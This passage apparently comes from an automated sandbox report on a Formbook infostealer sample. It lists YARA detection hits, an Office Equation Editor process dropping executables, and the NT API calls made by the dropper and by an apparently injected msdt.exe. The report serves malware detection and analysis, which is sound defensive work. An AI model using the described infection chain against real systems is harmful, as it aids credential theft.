          Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\medicomzx[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\medicomsh78694.exe
          .NET source code contains very large strings
          Source: medicomzx[1].exe.2.dr, MainForm.cs Long String: Length: 22528
          Source: medicomsh78694.exe.2.dr, MainForm.cs Long String: Length: 22528
          Source: 4.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs Long String: Length: 22528
          Source: 4.2.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs Long String: Length: 22528
          Source: 5.0.medicomsh78694.exe.ad0000.2.unpack, MainForm.cs Long String: Length: 22528
          Source: 5.0.medicomsh78694.exe.ad0000.4.unpack, MainForm.cs Long String: Length: 22528
          Source: 5.2.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs Long String: Length: 22528
          Source: 5.0.medicomsh78694.exe.ad0000.0.unpack, MainForm.cs Long String: Length: 22528
          Source: 5.0.medicomsh78694.exe.ad0000.1.unpack, MainForm.cs Long String: Length: 22528
          Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.medicomsh78694.exe.3221198.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.medicomsh78694.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.medicomsh78694.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.medicomsh78694.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ~WRF{828CF0EA-BCAC-4336-9A41-FE0BC8A11CE4}.tmp.0.drOLE indicator application name: unknown
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0037F108
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_003706CC
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004414F0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00441D51
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445E40
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00442752
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445450
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445C78
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445808
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00449820
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004468C8
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004404E7
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445C88
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004414BD
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0044B588
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004445A0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004445B0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00445A60
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00443668
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_0044CE00
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_004457FA
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 4_2_00AD79AE
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00401026
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00401030
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041D034
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041C0C7
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041C969
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00401174
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041B93E
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00408C90
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00402D90
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BBE0C6
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BED005
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BD905A
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC3040
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BBE2E9
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C61238
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BE63DB
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BBF3CF
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C663BF
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC2305
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C0A37B
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC7353
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BD1489
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BF5485
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BFD47D
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BDC5F0
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C06540
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC351F
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BC4680
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BCE6C1
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C62622
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C0A634
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BCC7BC
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C4579A
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BF57C3
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00C5F8EE
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00AD79AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026A1238
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FE2E9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0264A37B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02607353
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02602305
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FF3CF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026263DB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026A63BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02603040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261905A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262D005
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FE0C6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026A2622
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0264A634
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260E6C1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02604680
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026357C3
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260C7BC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0268579A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0263D47D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0268443E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02635485
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02611489
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02646540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260351F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261C5F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026B3A83
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02627B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025FFBD7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0268DBDA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026ACBA4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262286D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260C85C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0269F8EE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0268394B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02685955
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026169FE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026029B2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_026A098E
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0261EE4C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02632E2F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0262DF7C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02610F3F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02672FDC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0269CFB1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0260CD5B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_02630D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0269FDDD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0009D034
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0009C0C5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 02643F92 appears 132 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0264373B appears 244 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0266F970 appears 84 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 025FE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 025FDF5C appears 119 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: String function: 00C2F970 appears 46 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: String function: 00BBDF5C appears 65 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: String function: 00C0373B appears 109 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: String function: 00C03F92 appears 72 times
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004185F0 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004186A0 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00418720 NtClose,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004185EA NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00418642 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041869A NtReadFile,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_0041871A NtClose,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_004187CA NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BAFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB10D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB0060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB01D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\medicomsh78694.exeCode function: 5_2_00BB1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025EFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_025F10D0 NtOpenProcessToken,
